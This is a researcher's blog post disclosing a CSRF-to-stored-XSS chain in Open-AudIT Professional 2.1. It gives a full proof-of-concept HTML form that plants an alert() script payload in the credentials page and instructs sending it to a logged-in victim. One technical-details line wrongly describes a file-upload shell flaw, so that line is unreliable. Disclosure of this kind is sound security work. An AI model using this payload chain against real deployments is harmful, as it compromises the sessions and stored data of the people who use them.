CSRF to XSS - Open-AuditIT Professional 2.1

CSRF to XSS - Open-AuditIT Professional 2.1

Hi All,

Recently in one of my pentest research, I found a Open-AuditIT Professional 2.1.

Open-AudIT is a network auditing application. It is based on the scripting languages of PHP, Bash and VBScript. Open-AudIT can tell what is on your network, how it is configured and if there have been any changes

Curious to explore its functionalities, I downloaded and set it up in my local system.

After fiddling with the source code, I found that it did not have any kind of CSRF protection neither Cross site scripting(XSS) Protection and allowed the user to insert any malicious inputs. So I thought to chain this both vulnerability together. i.e. CSRF to XSS.

  • Title of the Vulnerability:  CSRF to XSS
  • Vulnerability Class: XSS and CSRF 
  • Technical Details & Description: The application source code is coded in a way which allows arbitrary file extensions to be uploaded. This leads to uploading of remote shells/ malicious Trojans which can lead to complete system compromise and server takeover.
  • CVE ID allocated:  
  1. CVE-2018-8903 - Stored XSS 
  2. CVE-2018-8979 - Cross-Site Request Forgery (CSRF) 
  • Product & Service Introduction: Open-AuditIT Professional 2.1

Observation:- [ CSRF to XSS]

When you login into Open-AuditIT Professional 2.1 and Create Credentials [Go to Home ==> Credentials ] you will notice that there is no protection against CSRF.



Digging more deep in source code, I also noticed that they do not have any protection against XSS for Name and Description parameter.




 So Next Step was chaining this both bug together .
Step 1 :- Craft a HTML Page with XSS payload in it. 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/omk/open-audit/credentials" method="POST">
      <input type="hidden" name="data&#91;attributes&#93;&#91;name&#93;" value="<img src=x onerror=alert('hacked');>" />
      <input type="hidden" name="data&#91;attributes&#93;&#91;org&#95;id&#93;" value="1" />
      <input type="hidden" name="data&#91;attributes&#93;&#91;description&#93;" value="CSRF" />
      <input type="hidden" name="data&#91;attributes&#93;&#91;type&#93;" value="ssh" />
      <input type="hidden" name="data&#91;attributes&#93;&#91;credentials&#93;&#91;username&#93;" value="test" />
      <input type="hidden" name="data&#91;attributes&#93;&#91;credentials&#93;&#91;password&#93;" value="test" />
      <input type="hidden" name="data&#91;type&#93;" value="credentials" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Step 2:- Save this .html file and send it to victim (Victim  should be loggedin in the browser)

Under Credentials New Entry will be added with your XSS payload. 



When any user will visit this page XSS will be triggered :-
http://localhost/omk/open-audit/credentials

 Video POC  for CSRF to XSS :-  



Conclusion :- 

 The main aim of this article is to show that POST based XSS should not be ignored as hard to exploit, but I also hope that it helps to give you ideas of how combining attacks can make them much more potent. 

Share this

Nilesh Sapariya

Related Posts

Next
« Prev Post
Previous
Next Post »
Subscribe to: Post Comments (Atom)